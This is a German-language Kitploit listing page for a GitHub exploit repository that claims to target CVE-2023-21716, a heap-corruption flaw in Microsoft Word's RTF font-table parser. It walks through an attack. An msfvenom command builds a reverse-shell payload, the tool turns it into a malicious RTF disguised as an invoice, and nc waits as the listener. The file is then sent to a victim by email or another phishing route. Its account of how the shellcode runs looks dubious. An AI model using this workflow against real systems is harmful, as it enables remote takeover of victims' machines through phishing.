Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/reggyraider/cve-2023-21716
Phishing ToolsPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubreggyraider/cve-2023-21716

CVE-2023-21716

CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-21716 — Heap-Korruptions-RCE in Microsoft Word RTF fonttbl

Schweregrad: Kritisch (CVSS 9.8)
Betroffen: Microsoft Word 2013 / 2016 / 2019 / 2021 (ungepatcht)
Patch: Microsoft Februar 2023 Patch Tuesday
Autor: REGGYRAIDER


Schwachstellenübersicht

CVE-2023-21716 ist eine Heap-Korruptions-Schwachstelle im RTF-Parser (wwlib.dll) von Microsoft Word.
Wenn Word eine \fonttbl-Direktive mit mehr als 32.767 Schrifteinträgen parst, läuft ein interner vorzeichenbehafteter 16-Bit-Zähler über, was die Heap-Metadaten beschädigt. Dies ermöglicht es einem Angreifer, eine Remotecodeausführung zu erreichen, indem er dem Opfer lediglich eine präparierte .rtf-Datei sendet.

Keine Makros. Keine Benutzerinteraktion über das Öffnen der Datei hinaus.


Setup & Exploit

Schritt 1 — Roh-Shellcode mit msfvenom generieren

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin

Schritt 2 — Dieses Repository klonen

root@kitploit:~
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716

Schritt 3 — Die schädliche RTF erstellen

root@kitploit:~
python3 exploit.py payload.bin invoice_march2024.rtf

Schritt 4 — Ihren Listener starten

root@kitploit:~
nc -lvnp 4444

Schritt 5 — Die Datei zustellen

Per SMB hochladen, E-Mail-Anhang oder einen anderen Phishing-Vektor.
Wenn das Opfer invoice_march2024.rtf in einer ungepatchten Word-Version öffnet, erhalten Sie eine Reverse-Shell.


Funktionsweise

root@kitploit:~
Angreifer erstellt RTF       Word parst \fonttbl        Heap beschädigt
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl mit 32769+         Vorzeichenbehafteter 16-Bit-  Shellcode des
Schriftdefinitionen         Zähler läuft über → 0x8000   Angreifers wird ausgeführt
  1. Der Exploit bettet 32.769 \f<N>-Schriftdefinitionen innerhalb von \fonttbl ein.
  2. Word weist einen Puffer fester Größe basierend auf dem (nun überlaufenen) Zähler zu.
  3. Nachfolgende Schreibvorgänge von Schriftarten gehen über den zugewiesenen Puffer hinaus und beschädigen benachbarte Heap-Blöcke.
  4. Der rohe Shellcode (aus payload.bin) wird innerhalb von \pict platziert und landet in der beschädigten Region, wo er bei der Verarbeitung durch den Allokator zur Ausführung gelangt.

Haftungsausschluss

Dieses Werkzeug ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht.
Die Verwendung dieses Exploits gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben, ist illegal.
Der Autor übernimmt keine Verantwortung für Missbrauch.


Referenzen

  • Microsoft-Sicherheitshinweis
  • NVD-Eintrag
Tool herunterladen